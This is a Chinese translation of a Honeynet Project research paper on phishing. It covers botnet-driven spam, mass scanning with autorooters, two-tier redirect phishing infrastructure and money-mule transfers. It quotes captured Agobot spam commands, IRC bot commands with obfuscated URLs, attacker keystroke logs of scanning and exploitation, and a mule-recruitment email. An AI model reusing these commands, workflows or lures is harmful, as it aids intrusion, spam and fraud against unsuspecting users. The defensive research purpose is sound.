本次攻击案例的一个概要时间线如下表所示：

第三种网络钓鱼技术－通过僵尸网络进行钓鱼

蜜网项目组最近发布的一篇文章“ 了解你的敌人：跟踪 僵尸网络 ”介绍了一种追踪僵尸网络的方法。一个僵尸网络是由可被攻击者远程控制的被攻陷主机所构成的网络。由于他们的巨大数量（可以有成千上万的主机一起连接），当僵尸网络被用以分布式拒绝服务攻击时，可以对互联网社区构成巨大的威胁。在 2004 年 10 月的一次调查中，电子邮件安全公司 CipherTrust 得出了 70% 监视到的钓鱼垃圾邮件是从 5 个活跃的僵尸网络中的 1 个所发出的，但是我们的观察显示有更多的僵尸网络已经被用来进行发送垃圾邮件。尽管还没有一个显著的实际案例分析，在本节中我们还是给出了我们对可被攻击者以僵尸网络的方式进行网络钓鱼攻击的工具和技术的观察结果。

案例时间表

在从 2004 年 9 月到 2005 年 1 月的这段时期中，德国蜜网项目组部署了一系列安装未打补丁的微软 Windows 操作系统的蜜罐，以观察僵尸网络活动。我们开发了一个自动化部署的过程，使得蜜罐可以被重复性地部署，攻陷及离线分析。在此期间，超过 100 个不同的僵尸网络被发现，以及上千的文件被获取用以离线分析。

分析

一些在此研究项目中捕获的僵尸工具提供了在被攻陷主机上远程启动一个 SOCKS v4/v5 代理的能力。 SOCKS 为基于 TCP /IP 的网络应用程序提供了一种通用化的代理机制（ RFC 1928 ），可以被用来代理最普遍的互联网流量，如 HTTP 和 SMTP 等。如果攻击者能够成功地通过僵尸网络的控制使得各个远程傀儡主机上都开放 SOCKS 代理服务功能，那么该主机可以被用来发送大量的垃圾邮件，如果僵尸网络中包含成千上万的傀儡主机，那么攻击者可以轻易地发送巨大数量的垃圾邮件，而这些垃圾邮件的发送源头却是覆盖巨大 IP 地址范围的属于一些无戒备心用户的家庭 PC 机。

不存在集中的控制点，以及其范围超出了国界使得很难对僵尸网络的活动进行追踪和阻断。这也使得僵尸网络为垃圾邮件发布者和钓鱼者提供了一种低风险的、但高回报的攻击方法。或许不会令人惊讶，富有傀儡资源的僵尸网络拥有者已经开始以犯罪为目标，并且目前也已经出现 租借 僵尸网络 的现象。为了赚取租金，僵尸网络的操作者将会给他的客户提供一个支持 SOCKS v4 的服务器 IP 地址和端口。已经有报道显示僵尸网络被出售给垃圾邮件发布者作为垃圾邮件的转发服务器。 " Uncovered: Trojans as Spam Robots ". 一些捕获的僵尸工具也实现了能够获取 Email 地址，或者通过傀儡主机发送垃圾邮件的特殊功能。下面的列表显示了一些在 Agobot （一个被攻击者非常普遍使用的僵尸工具，其变种也经常在我们的研究过程中被捕获）中实现的与垃圾邮件 / 钓鱼邮件相关的指令：

• harvest.emails – 使得僵尸工具获得一个 Email 地址列表
• harvest.emailshttp – 使得僵尸工具通过 HTTP 获得一个 Email 地址列表
• spam .setlist – 下载一个 Email 地址列表
• spam .settemplate – 下载一个 Email 模板
• spam .start – 开始发送垃圾邮件
• spam .stop – 停止发送垃圾邮件
• aol spam .setlist - AOL - 下载一个 Email 地址列表
• aolspam.settemplate - AOL - 下载一个 Email 模板
• aol spam .setuser - AOL – 设置用户名
• aol spam .setpass - AOL －设置口令
• aol spam .start - "AOL - 开始发送垃圾邮件
• aol spam .stop - "AOL - 停止发送垃圾邮件

关于这些指令实现的进一步信息，可以在 这 找到，以僵尸工具源码的注释形式给出。在 drone －一个由德国蜜网项目组开发的自定制 IRC 客户端的帮助下，通过利用我们的蜜网所捕获的网络连接数据将 drone 混入僵尸网络中，我们可以对僵尸网络如何被用以进行发送垃圾邮件 / 钓鱼邮件进行更深入的了解。以下将给出一些观察到的典型活动案例。

实例 1

在一个特定的僵尸网络中，我们观察到攻击者发出了以下指令（注意 URL 都已经被混淆了）：

<St0n3y> .mm http://www.example.com/email/fetch.php? 4a 005aec5d7dbe3b 01c 75aab2b 1c 9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

.mm (mass emailing) 指令是一个一般化的 spam_start 指令的定制版本。这个指令接收以下 4 个参数：

1. 一个包含多个 Email 地址文件的 URL
2. 包含在垃圾邮件中的目标网站地址链接－这个网站可能是一个普遍的垃圾网页，也可能是一个钓鱼网站
3. 发送者的名字
4. 邮件的主题

在本次攻击案例中，每次调用 fetch.php 脚本会返回 30 个不同的 Email 地址。对于每个收信者，将会构造一个 Email 邮件，将宣传指令中第二个参数给出的链接。在这个实例中，第二个参数的链接指向了一个企图在受害者主机上安装一个恶意 ActiveX 组件的网页。

实例 2

在另一个僵尸网络中，我们观察到在受害者 PC 上安装浏览器助手组件的攻击方式：

[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s

.open 指令告诉每个僵尸工具打开所申请的网页并显示给受害者，在这个案例中，这个网页中包含一个浏览器助手组件，企图在受害者主机上安装自身。从这个 IRC 频道的名称可以显示出，这个僵尸网络也是用以发送垃圾邮件的。

实例 3

在另外一个僵尸网络上，我们观察到 spyware 传播的实例：

http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...]

这个链接在对捕获到的恶意软件的分析中获得，它将受害者指向了一个提供“免费的广告传播软件”的公司的网页，这个网站包含了在企图访问客户端上安装 ActiveX 组件（推测是 adware 或 spyware ）的多个页面。

普遍的攻击旋律

在我们对网络钓鱼攻击的研究过程中发现了一些普遍的攻击旋律，攻击者显然在混合使用一些工具和技术来提高他们成功的机会。我们现在开始分析两种这样的技术－批量扫描和组合式攻击。

批量扫描

通过对一些被攻陷蜜罐的分析表明，系统是自动化的攻击脚本所攻陷，这些自动化攻击脚本通常被称为 autorooters 。在上面描述的两个案例中，一旦攻击者攻陷了蜜罐， autorooter 的 toolkits 就被上传到服务器上，然后攻击者就开始尝试扫描一些 IP 地址空间段来寻找其他同样存在漏洞的服务器（在德国案例中使用的称为 superwu 的扫描器，而在英国案例中使用了 mole 扫描器 ）。在英国案例中捕获的攻击者键击记录如下所示，显示了从被攻陷的蜜罐发起的批量扫描的实例。注意由于蜜网配置，这些往外的恶意流量会被阻断，从而这些攻击不会成功。

攻击者解压缩扫描器，并尝试扫描 B 类地址空间段：
[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz
[2004-07-18 15:23:33 bash 0]cd mole
[2004-07-18 15:23:38 bash 0]./mazz 63.2
[2004-07-18 15:24:04 bash 0]./mazz 207.55
[2004-07-18 15:25:13 bash 0]./scan 80.82

攻击者尝试攻击潜在的有漏洞的服务器：
[2004-07-19 11:56:46 bash 0]cd mole
[2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net
[2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNNs

攻击者在一段时间后回来查看已经成功攻陷的服务器列表（这个列表是空的，由于蜜网的配置）：
[2004-07-23 08:13:18 bash 0]cd mole
[2004-07-23 08:13:20 bash 0]ls
[2004-07-23 08:13:25 bash 0]cat hacked.servers

攻击者尝试扫描更多的 B 类地址空间段，并随后测试对选择目标进行攻击：
[2004-07-24 10:24:17 bash 0]cd mole
[2004-07-24 10:24:19 bash 0]./scan 140.130
[2004-07-24 10:24:27 bash 0]./scan 166.80
[2004-07-24 10:25:36 bash 0]./scan 166.4
[2004-07-24 10:26:23 bash 0]./scan 139.93
[2004-07-24 10:27:18 bash 0]./scan 133.200
[2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX
[2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY
[2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY

在上述最后一个例子中，注意攻击者尝试攻陷的几个主机并不在从这个蜜罐扫描的 IP 地址范围内，这又一次提供了批量扫描行为的高协同性和并行性。

对英国攻击者下载的 mole .tgz 文件的进一步调查揭示了在解压后的 aotorooter toolkit 的根目录中有一些 text 文件。这些文件包括扫描配置信息和之前扫描“ grabbb2.x and samba 2.2.8 vulnerability ”的扫描结果日志。在这些文件中还包含 42 个针对其他主机的攻击案例，以及针对多个 B 类地址空间扫描的结果，从而证明了观察到的攻击案例是一个更大的更具组织性的针对类似系统的攻击中的一部分。一个从攻击者的角度查看的 mole 扫描工具的输出结果的实例，可以在 这 找到。

最后，一些从攻陷蜜罐上发现的批量扫描工具看起来并没有广泛地传播，这也显示了这些攻击者拥有超越基本的脚本小子的一定水平的开发能力和工具制造能力，或者是一个并没有将他们的工具共享给公开论坛的封闭社团的成员。又一次，这显示了具有良好组织性的攻击者的能力。

组合式攻击

在我们的研究中，我们也发现了钓鱼者经常组合三种不同的攻击技术。正如我们观察到，并在本文所描述的，一些时候多种方法将提供一些冗余性，并通过一个两层的网络拓扑配置保护他们的网络钓鱼攻击基础设置。下图描述了一种可能的网络钓鱼攻击拓扑结构：

screen.width-333)this.width=screen.width-333" border=0>

在这个实例中，一个中央的网站服务器架设了物理上的钓鱼网站内容，通常包含针对多个目标机构的多个网站（如在 /ebay 目录下有 一个 eBay 钓鱼网站，在 .paypal 目录下有一个 PayPal 钓鱼网站 ）。一些被攻陷的远程主机在 redir 端口重定向器的帮助下将连入 TCP 80 端口的 HTTP 流量重定向到中央的网站服务器。这种方案从攻击者的角度看来比一个单一的钓鱼网站拥有以下的一些优势：

• 如果一台远程的 redir 主机被检测到了，那么受害者将把这个系统离线并重新安装，但这并不会对钓鱼者构成很大的损失，因为主钓鱼网站仍然在线，而且其他的 redir 主机仍然可以将 HTTP 流量转发到中央网站服务器。
• 如果中央的钓鱼网站服务器被检测到，这个系统将被离线，但钓鱼者可以在一台新攻陷的主机上重新架设钓鱼网站，并重新矫正原先的 redir 主机重定向流量到代替的中央网站服务器。使用这种技术，整个网络可以很快地重新恢复可用，网络钓鱼攻击可以快速地重新开始。
• 一台 redir 主机可以非常灵活，因为它可以通过非常简单地重新配置指向另外一个钓鱼网站。这也减少了从初始的系统攻陷到钓鱼网站可用的这段时间，从而增加了网络钓鱼攻击可以进行的时间长度。

使用这样的组合攻击技术又一次验证了攻击者的高组织性和能力，而不仅仅是简单的脚本小子。类似的运行模型也经常被主流的网站服务提供商和超大容量数据内容提供商（如 Google ）所运用。

进一步的发现：资金转账

我们的研究同时也关注钓鱼者如何使用捕获的银行账号信息（如一个与相关的交易代号联系在一起的银行账号）。因为大多数银行都对跨国的资金流通进行监控，钓鱼者并不能简单地不引起金融权威机构注意下，从一个国家转移一大笔资金到另外一个国家。钓鱼者于是使用一些中介来为他们转移资金－以两阶段的步骤，钓鱼者先从受害者银行账号中把钱转移到一个同国中介人的银行账号中，中介人然后从他们的银行账号中提出现金（留下一定百分比作为他们的提供此转账服务的报酬）并寄给钓鱼者，如通过普通的地面信件。当然，这些中介人可能被捕，但是由于钓鱼者的钱已经在传输途中，他们并不会面对太大的安全风险，同时也可以很容易地转移他们的资金流通渠道到另外的中介人。一个可以说明在网络钓鱼攻击背后的金融结构的电子邮件实例如下：

Hello!
We finding Europe persons, who can Send/Receive bank wires
from our sellings, from our European clients. To not pay
TAXES from international transfers in Russia . We offer 10%
percent from amount u receive and pay all fees, for sending
funds back.Amount from 1000 euro per day. All this activity
are legal in Europe .
Fill this form: http://XXX.info/index.php (before filling
install yahoo! messenger please or msn), you will recieve
full details very quickly.

_________________________________________________________

Wir, europ?ische Personen findend, die Bankleitungen
davon Senden/erhalten k?nnen unsere Verk?ufe, von
unseren Kunden von Deutschland. STEUERN von internationalen
übertragungen in Russland nicht zu bezahlen. Wir
erh?lt das Prozent des Angebots 10 % vom Betrag und
bezahlt alle Schulgelder, um Kapital zurück zu senden.
Betrag von 1000 Euro pro Tag. Diese ganze T?tigkeit
ist in Europa gesetzlich.
Füllen Sie diese Form: http://XXX.info/index.php (bevor
die Füllung Yahoo installiert! Bote bitte oder msn), Sie
recieve volle Details sehr.

Thank you, FINANCIE LTD.

这是一封从英文到德文的非常烂的翻译稿，可能是通过翻译软件自动产生的，这也说明攻击者并不是以英语为母语的。因为钱将会被转移到俄罗斯，所以攻击者很可能来自这个国家。资金转移行为也正随着网络钓鱼攻击越来越具组织性变得越来越普遍。

Honeysnap – 一个攻击案例分析助手

一个从我们开始分析被上述网络钓鱼攻击攻陷的蜜罐数据时立即得到的一个结论是：由于不同黑客组织同时进行的多个攻击，我们需要非常多的时间从网络的流量中去抽取和准备用于进一步详细分析的数据。这个数据抽取过程是重复性的且枯燥乏味的，如果由人工进行将会使得我们宝贵的分析时间的效率大打折扣。因此需要一个自动化的解决方案。

由英国蜜罐项目组 David Watson 编写的 honeysnap 脚本正是基于此目的，被设计用来对蜜网日常捕获的数据为输入产生出一个简单的摘要输出，用于指导进一步的人工分析。 honeysnap 脚本对每个蜜罐的数据进行分类，提供了连出的 HTTP 和 FTP GETs 请求、 IRC 消息和 Sebek 键击记录日志列表功能，对关键网络连接能够进行自动化的 TCP 流重组，并抽取、标识和存储由 FTP 或 HTTP 下载的文件， honeysnap 脚本使得大多数消耗大量时间的攻击案例准备性工作都被移除，使得分析员能够集中精力人工地分析案例中的关键部分。 honeysnap 脚本还支持一个自动化的方法对包含感兴趣的关键字（如银行、账号、口令等）的 IRC 通讯进行显示，并提供日常性的 Email 报告功能。

目前的 honeysnap 脚本的一个基本的概念证明性的 UNIX shell 脚本，其 alpha 版可以在此找到，同时一组 honeysnap 输出 示例可以在此找到。一个模块化的并完全扩展的以 Python 编写的版本目前正在由蜜网项目组的成员开发中，并将与 2005 年 6 月发布 beta 测试版。

进一步的研究

在本文给出的信息给出了在网络钓鱼攻击领域进行进一步研究的一些潜在方法，我们同时建议在以下的一些方面进行更深入的调查和研究：

我们希望能够调查蜜罐技术能否被用于帮助与垃圾邮件发送者和钓鱼者进行对抗。一个可能的研究项目是部署一些在上述观察到的网络钓鱼攻击中所通常使用类型的蜜罐，或是一些对垃圾邮件发送者具有很强的吸引力的蜜罐（ 如 SMTP open relays ），对攻击者对这些系统的攻击行为进行进一步的分析，能够帮助我们更深入地对网络钓鱼攻击进行剖析，特别是使用僵尸网络进行网络钓鱼这一领域，并能够对网络钓鱼攻击的创新进行跟踪。另外一个研究的可能性是进一步发展蜜罐的概念，研究客户端蜜罐技术，这种新一代的蜜罐工具能更活跃地参与到通讯网络中，例如，自动地随着垃圾邮件中的链接去访问目标网站内容。客户端蜜罐工具可以在 IRC 频道中发呆或通过 P2P 网络共享 / 下载文件，从而进一步地提高我们对这些通讯网络中所面临地安全威胁的了解。

另外，我们期望能够对对付和阻止这些网络钓鱼攻击的潜在方法进行深入研究。因为从一个网络钓鱼攻击的开始到结束的时间周期可能只有几个小时或几天，同时攻击源也可能广泛地分布，所以这将是一个困难的任务。目前在此领域研究的工作（如 The AntiPhishing Group 和 PhishReport ）关注于依靠终端用户收集钓鱼邮件。虽然这是个可行的途径，但它只能在网络钓鱼攻击生命周期的最后阶段进行发现。 我们更需要 一个自动化地对网络钓鱼攻击捕获和响应的机制。

我们怀疑这些账号和口令在黑客界会被进行交易流通，可能通过 IRC 。蜜网技术可以被用来捕获这些通讯，并更深入地了解网络钓鱼攻击行为。另外，网络钓鱼攻击工具经常可以从一些经常更新地中央网站服务器或 FTP 服务器上下载获得。尽管充满争议，但对这些活动可以进行监控或联系系统拥有者以帮助他阻止这些网络钓鱼攻击，同时我们应该建立一个体系框架，从而对这些活动进行研究，并提出潜在的对策。

需要在提高案例分析的自动化进行进一步的研究工作，特别是对在这些攻击过程中捕获数据的自动轮廓生成。自动的流量和 IP 地址抽取， DNS 反向查询和 IP 地址块拥有者查询，针对每个 IP 地址或每个域名的流量摘要，以及被动的操作系统指纹辨识等功能在分析大规模的数据集时是非常有用的，在分析一个本地的包括已知主机、攻击者、攻击特征、消息内容等的取证数据库也是同样关键。在一个长期的规划中，需要建立共享这些信息的统一标准，以及一个全球的取证分析数据库从而支持对分布式的黑客活动进行分析，这也将是对整个互联网社区所高度需要和有显著意义的。

结论

在本文中我们展示了一些真实世界发生的网络钓鱼攻击的实际案例，以及在这些案例中攻击者进行的典型的行为。所有这些提供的信息都是使用高交互性的研究型蜜罐所捕获的，这又一次证明了蜜网技术在信息保障和取证分析领域里是一个强有力的工具。我们分析了攻击由德国和英国蜜网研究项目组部署的蜜罐的几次攻击。在两个案例中，钓鱼者攻击并攻陷了蜜罐系统，在攻陷主机后他们的动作开始有所差异。如下的网络钓鱼攻击各阶段的攻击技术被发现：

1. 以著名的一些组织结构为目标，架设其钓鱼网站
2. 发送欺骗性垃圾邮件，引诱受害者访问钓鱼网站
3. 安装重定向服务，将网站流量都转发到已架设的钓鱼网站
4. 通过僵尸网络传播垃圾邮件和钓鱼邮件

这些数据帮助我们了解钓鱼者的典型攻击行为和他们用来引诱和欺骗受害者的一些方法。我们已经学习到网络钓鱼攻击可以非常快地发生，在最初的系统入侵到一个钓鱼网站在线，并发出宣扬此网站的钓鱼垃圾邮件只有相当有限的时间，而这么快的攻击速度使得这些攻击者很难被追踪和阻止。

我们的研究同时显示网络钓鱼攻击正在变得越来越普遍而且具有良好的组织性。我们已经观察到针对主要的几个在线组织机构的预先构建的钓鱼网站的归档，这使得钓鱼者可以在很短的时间内准备好进行钓鱼攻击，这也说明了背后隐藏着一个组织良好的钓鱼攻击团体。这些钓鱼内容可以通过利用端口重定向器或僵尸网络快速地进一步扩散。与批量扫描的证据和钓鱼网站内容中手动形式加入的 IP 地址，我们可以相信在一个时刻会有多个特定钓鱼网站的实例同时存在，在上传的钓鱼网站构建完成之前，到达这个刚被攻陷的服务器的网页浏览流量就已经被发现，而且在某个被攻陷主机上发出的钓鱼垃圾邮件也有可能并不是在引诱受害者访问发送邮件的这台主机，这些现象都说明有良好组织性的钓鱼团队在进行分布式和并行的钓鱼攻击。

我们的研究工作显示了垃圾邮件、僵尸网络和网络钓鱼攻击之间一个清晰的连接关系，以及利用中介来完成最后的隐蔽性资金转账。这些观察到的现象，结合大规模的批量漏洞扫描和两层拓扑结构的钓鱼网络，都证明了钓鱼者所带来的真实威胁，钓鱼活动的组织严密性，以及他们所使用的相当高级的攻击技术。随着钓鱼攻击的技术门槛进一步增高及潜在的回报进一步增加，在未来几年中，网络钓鱼攻击的技术很可能进一步地发展，并且网络钓鱼攻击的数量也将进一步增长。减少可被僵尸网络控制的有漏洞的 PC 机，抑制数量不断增多的垃圾邮件，防止有组织性的犯罪活动，并且教育互联网用户关注来自社交工程的潜在安全风险，所有这些都还充满了挑战。 http://www.hack58.net/Article/60/61/2005/2477.htm